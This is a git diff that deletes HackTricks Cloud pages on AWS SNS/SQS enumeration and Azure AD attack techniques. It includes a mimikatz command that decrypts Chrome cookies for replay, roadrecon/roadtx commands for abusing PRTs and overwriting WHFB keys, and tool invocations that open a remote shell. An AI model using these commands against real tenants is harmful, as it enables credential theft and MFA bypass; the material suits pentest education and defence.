-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md deleted file mode 100644 index 416a48e0e..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md +++ /dev/null @@ -1,47 +0,0 @@ -# AWS - SNS Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
-
-## SNS
-
-For more information about SNS check:
-
-{% content-ref url="../aws-services/aws-sns-enum.md" %}
-[aws-sns-enum.md](../aws-services/aws-sns-enum.md)
-{% endcontent-ref %}
-
-### Open to All
-
-When you configure a SNS topic from the web console it's possible to indicate that **Everyone can publish and subscribe** to the topic:
-
-
- -So if you **find the ARN of topics** inside the account (or brute forcing potential names for topics) you can **check** if you can **publish** or **subscribe** to **them**. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md deleted file mode 100644 index 5926225b3..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md +++ /dev/null @@ -1,49 +0,0 @@ -# AWS - SQS Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
-
-## SQS
-
-For more information about SQS check:
-
-{% content-ref url="../aws-services/aws-sqs-and-sns-enum.md" %}
-[aws-sqs-and-sns-enum.md](../aws-services/aws-sqs-and-sns-enum.md)
-{% endcontent-ref %}
-
-### Public URL template
-
-```
-https://sqs.[region].amazonaws.com/[account-id]/{user_provided}
-```
-
-### Check Permissions
-
-It's possible to misconfigure a SQS queue policy and grant permissions to everyone in AWS to send and receive messages, so if you get the ARN of queues try if you can access them.
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-device-registration.md b/pentesting-cloud/azure-security/az-device-registration.md deleted file mode 100644 index 44e42482b..000000000 --- a/pentesting-cloud/azure-security/az-device-registration.md +++ /dev/null @@ -1,138 +0,0 @@ -# Az - Device Registration - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -When a device joins AzureAD a new object is created in AzureAD. - -When registering a device, the **user is asked to login with his account** (asking for MFA if needed), then it request tokens for the device registration service and then ask a final confirmation prompt. - -Then, two RSA keypairs are generated in the device: The **device key** (**public** key) which is sent to **AzureAD** and the **transport** key (**private** key) which is stored in TPM if possible. - -Then, the **object** is generated in **AzureAD** (not in Intune) and AzureAD gives back to the device a **certificate** signed by it. You can check that the **device is AzureAD joined** and info about the **certificate** (like if it's protected by TPM).: - -```bash -dsregcmd /status -``` - -After the device registration a **Primary Refresh Token** is requested by the LSASS CloudAP module and given to the device. With the PRT is also delivered the **session key encrypted so only the device can decrypt it** (using the public key of the transport key) and it's **needed to use the PRT.** - -For more information about what is a PRT check: - -{% content-ref url="az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md" %} -[az-primary-refresh-token-prt.md](az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md) -{% endcontent-ref %} - -### TPM - Trusted Platform Module - -The **TPM** **protects** against key **extraction** from a powered down device (if protected by PIN) nd from extracting the private material from the OS layer.\ -But it **doesn't protect** against **sniffing** the physical connection between the TPM and CPU or **using the cryptograpic material** in the TPM while the system is running from a process with **SYSTEM** rights. 
- -If you check the following page you will see that **stealing the PRT** can be used to access like a the **user**, which is great because the **PRT is located devices**, so it can be stolen from them (or if not stolen abused to generate new signing keys): - -{% content-ref url="az-lateral-movement-cloud-on-prem/pass-the-prt.md" %} -[pass-the-prt.md](az-lateral-movement-cloud-on-prem/pass-the-prt.md) -{% endcontent-ref %} - -## Registering a device with SSO tokens - -It would be possible for an attacker to request a token for the Microsoft device registration service from the compromised device and register it: - -```bash -# Initialize SSO flow -roadrecon auth prt-init -.\ROADtoken.exe - -# Request token with PRT with PRT cookie -roadrecon auth -r 01cb2876-7ebd-4aa4-9cc9-d28bd4d359a9 --prt-cookie - -# Custom pyhton script to register a device (check roadtx) -registerdevice.py -``` - -Which will give you a **certificate you can use to ask for PRTs in the future**. Therefore maintaining persistence and **bypassing MFA** because the original PRT token used to register the new device **already had MFA permissions granted**. - -{% hint style="success" %} -Note that to perform this attack you will need permissions to **register new devices**. Also, registering a device doesn't mean the device will be **allowed to enrol into Intune**. -{% endhint %} - -{% hint style="danger" %} -This attack was fixed in September 2021 as you can no longer register new devices using a SSO tokens. However, it's still possible to register devices in a legit way (having username, password and MFA if needed). Check: [**roadtx**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-roadtx-authentication.md). 
-{% endhint %} - -## Overwriting a device ticket - -It was possible to **request a device ticket**, **overwrite** the current one of the device, and during the flow **steal the PRT** (so no need to steal it from the TPM. For more info [**check this talk**](https://youtu.be/BduCn8cLV1A). - -
- -{% hint style="danger" %} -However, this was fixed. -{% endhint %} - -## Overwrite WHFB key - -[**Check the original slides here**](https://dirkjanm.io/assets/raw/Windows%20Hello%20from%20the%20other%20side_nsec_v1.0.pdf) - -Attack summary: - -* It's possible to **overwrite** the **registered WHFB** key from a **device** via SSO -* It **defeats TPM protection** as the key is **sniffed during the generation** of the new key -* This also provides **persistence** - -
- -Users can modify their own searchableDeviceKey property via the Azure AD Graph, however, the attacker needs to have a device in the tenant (registered on the fly or having stolen cert + key from a legit device) and a valid access token for the AAD Graph. - -Then, it's possible to generate a new key with: - -```bash -roadtx genhellokey -d -k tempkey.key -``` - -and then PATCH the information of the searchableDeviceKey: - -
- -It's possible to get an access token from a user via **device code phishing** and abuse the previous steps to **steal his access**. For more information check: - -{% content-ref url="az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md" %} -[az-phishing-primary-refresh-token-microsoft-entra.md](az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md) -{% endcontent-ref %} - -
- -## References - -* [https://youtu.be/BduCn8cLV1A](https://youtu.be/BduCn8cLV1A) -* [https://www.youtube.com/watch?v=x609c-MUZ\_g](https://www.youtube.com/watch?v=x609c-MUZ_g) -* [https://www.youtube.com/watch?v=AFay\_58QubY](https://www.youtube.com/watch?v=AFay_58QubY) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md deleted file mode 100644 index 5cb58cb86..000000000 --- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md +++ /dev/null @@ -1,91 +0,0 @@ -# Az - Lateral Movement (Cloud - On-Prem) - -## Az - Lateral Movement (Cloud - On-Prem) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### On-Prem machines connected to cloud - -There are different ways a machine can be connected to the cloud: - -#### Azure AD joined - -
- -#### Workplace joined - -

https://pbs.twimg.com/media/EQZv7UHXsAArdhn?format=jpg&name=large

- -#### Hybrid joined - -

https://pbs.twimg.com/media/EQZv77jXkAAC4LK?format=jpg&name=large

- -#### Workplace joined on AADJ or Hybrid - -

https://pbs.twimg.com/media/EQZv8qBX0AAMWuR?format=jpg&name=large

- -### Tokens and limitations - -In Azure AD, there are different types of tokens with specific limitations: - -* **Access tokens**: Used to access APIs and resources like the Microsoft Graph. They are tied to a specific client and resource. -* **Refresh tokens**: Issued to applications to obtain new access tokens. They can only be used by the application they were issued to or a group of applications. -* **Primary Refresh Tokens (PRT)**: Used for Single Sign-On on Azure AD joined, registered, or hybrid joined devices. They can be used in browser sign-in flows and for signing in to mobile and desktop applications on the device. -* **Windows Hello for Business keys (WHFB)**: Used for passwordless authentication. It's used to get Primary Refresh Tokens. - -The most interesting type of token is the Primary Refresh Token (PRT). - -{% content-ref url="az-primary-refresh-token-prt.md" %} -[az-primary-refresh-token-prt.md](az-primary-refresh-token-prt.md) -{% endcontent-ref %} - -### Pivoting Techniques - -From the **compromised machine to the cloud**: - -* [**Pass the Cookie**](az-pass-the-cookie.md): Steal Azure cookies from the browser and use them to login -* [**Dump processes access tokens**](az-processes-memory-access-token.md): Dump the memory of local processes synchronized with the cloud (like excel, Teams...) and find access tokens in clear text. -* [**Phishing Primary Refresh Token**](az-phishing-primary-refresh-token-microsoft-entra.md)**:** Phish the PRT to abuse it -* [**Pass the PRT**](pass-the-prt.md): Steal the device PRT to access Azure impersonating it. 
-* [**Pass the Certificate**](az-pass-the-certificate.md)**:** Generate a cert based on the PRT to login from one machine to another - -From compromising **AD** to compromising the **Cloud** and from compromising the **Cloud to** compromising **AD**: - -* [**Azure AD Connect**](azure-ad-connect-hybrid-identity/) -* **Another way to pivot from could to On-Prem is** [**abusing Intune**](../az-services/intune.md) - -#### [Roadtx](https://github.com/dirkjanm/ROADtools) - -This tool allows to perform several actions like register a machine in Azure AD to obtain a PRT, and use PRTs (legit or stolen) to access resources in several different ways. These are not direct attacks, but it facilitates the use of PRTs to access resources in different ways. Find more info in [https://dirkjanm.io/introducing-roadtools-token-exchange-roadtx/](https://dirkjanm.io/introducing-roadtools-token-exchange-roadtx/) - -## References - -* [https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/](https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md deleted file mode 100644 index 0b2239549..000000000 --- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md +++ /dev/null @@ -1,65 +0,0 @@ -# Az - Local Cloud Credentials - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Local Token Storage and Security Considerations - -### Azure CLI (Command-Line Interface) - -Tokens and sensitive data are stored locally by Azure CLI, raising security concerns: - -1. **Access Tokens**: Stored in plaintext within `accessTokens.json` located at `C:\Users\\.Azure`. -2. **Subscription Information**: `azureProfile.json`, in the same directory, holds subscription details. -3. **Log Files**: The `ErrorRecords` folder within `.azure` might contain logs with exposed credentials, such as: - * Executed commands with credentials embedded. - * URLs accessed using tokens, potentially revealing sensitive information. - -### Azure PowerShell - -Azure PowerShell also stores tokens and sensitive data, which can be accessed locally: - -1. **Access Tokens**: `TokenCache.dat`, located at `C:\Users\\.Azure`, stores access tokens in plaintext. -2. **Service Principal Secrets**: These are stored unencrypted in `AzureRmContext.json`. -3. **Token Saving Feature**: Users have the ability to persist tokens using the `Save-AzContext` command, which should be used cautiously to prevent unauthorized access. - -## Automatic Tools to find them - -* [**Winpeas**](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS/winPEASexe) -* [**Get-AzurePasswords.ps1**](https://github.com/NetSPI/MicroBurst/blob/master/AzureRM/Get-AzurePasswords.ps1) - -## Security Recommendations - -Considering the storage of sensitive data in plaintext, it's crucial to secure these files and directories by: - -* Limiting access rights to these files. -* Regularly monitoring and auditing these directories for unauthorized access or unexpected changes. -* Employing encryption for sensitive files where possible. -* Educating users about the risks and best practices for handling such sensitive information. 
- -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md
deleted file mode 100644
index 31e22a7a5..000000000
--- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md
+++ /dev/null
@@ -1,67 +0,0 @@
-# Az - Pass the Certificate
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Pass the Certificate (Azure)
-
-In Azure joined machines, it's possible to authenticate from one machine to another using certificates that **must be issued by Azure AD CA** for the required user (as the subject) when both machines support the **NegoEx** authentication mechanism.
-
-In super simplified terms:
-
-* The machine (client) initiating the connection **needs a certificate from Azure AD for a user**.
-* Client creates a JSON Web Token (JWT) header containing PRT and other details, sign it using the Derived key (using the session key and the security context) and **sends it to Azure AD**
-* Azure AD verifies the JWT signature using client session key and security context, checks validity of PRT and **responds** with the **certificate**.
-
-In this scenario and after grabbing all the info needed for a [**Pass the PRT**](pass-the-prt.md) attack:
-
-* Username
-* Tenant ID
-* PRT
-* Security context
-* Derived Key
-
-It's possible to **request P2P certificate** for the user with the tool [**PrtToCert**](https://github.com/morRubin/PrtToCert)**:**
-
-{% code overflow="wrap" %}
-```bash
-RequestCert.py [-h] --tenantId TENANTID --prt PRT --userName USERNAME --hexCtx HEXCTX --hexDerivedKey HEXDERIVEDKEY [--passPhrase PASSPHRASE]
-```
-{% endcode %}
-
-The certificates will last the same as the PRT. To use the certificate you can use the python tool [**AzureADJoinedMachinePTC**](https://github.com/morRubin/AzureADJoinedMachinePTC) that will **authenticate** to the remote machine, run **PSEXEC** and **open a CMD** on the victim machine. This will allow us to use Mimikatz again to get the PRT of another user.
-
-```bash
-Main.py [-h] --usercert USERCERT --certpass CERTPASS --remoteip REMOTEIP
-```
-
-## References
-
-* For more details about how Pass the Certificate works check the original post [https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597](https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597)
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md
deleted file mode 100644
index cdead6bd4..000000000
--- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md
+++ /dev/null
@@ -1,59 +0,0 @@
-# Az - Pass the Cookie
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Why Cookies?
-
-Browser **cookies** are a great mechanism to **bypass authentication and MFA**. Because the user has already authenticated in the application, the session **cookie** can just be used to **access data** as that user, without needing to re-authenticate.
-
-You can see where are **browser cookies located** in:
-
-{% embed url="https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts?q=browse#google-chrome" %}
-
-## Attack
-
-The challenging part is that those **cookies are encrypted** for the **user** via the Microsoft Data Protection API (**DPAPI**). This is encrypted using cryptographic [keys tied to the user](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords) the cookies belong to. You can find more information about this in:
-
-{% embed url="https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords" %}
-
-With Mimikatz in hand, I am able to **extract a user’s cookies** even though they are encrypted with this command:
-
-```bash
-mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\cookies /unprotect" exit
-```
-
-For Azure, we care about the authentication cookies including **`ESTSAUTH`**, **`ESTSAUTHPERSISTENT`**, and **`ESTSAUTHLIGHT`**. Those are there because the user has been active on Azure lately.
-
-Just navigate to login.microsoftonline.com and add the cookie **`ESTSAUTHPERSISTENT`** (generated by “Stay Signed In” option) or **`ESTSAUTH`**. And you will be authenticated.
-
-## References
-
-* [https://stealthbits.com/blog/bypassing-mfa-with-pass-the-cookie/](https://stealthbits.com/blog/bypassing-mfa-with-pass-the-cookie/)
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md
deleted file mode 100644
index 301eb11d2..000000000
--- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md
+++ /dev/null
@@ -1,33 +0,0 @@
-# Az - Phishing Primary Refresh Token (Microsoft Entra)
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-**Check:** [**https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/**](https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/)
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md
deleted file mode 100644
index 1520fc868..000000000
--- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md
+++ /dev/null
@@ -1,33 +0,0 @@
-# Az - Primary Refresh Token (PRT)
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-**Chec the post in** [**https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/**](https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/) although another post explaining the same can be found in [**https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30**](https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30)
-
-{% hint style="success" %}
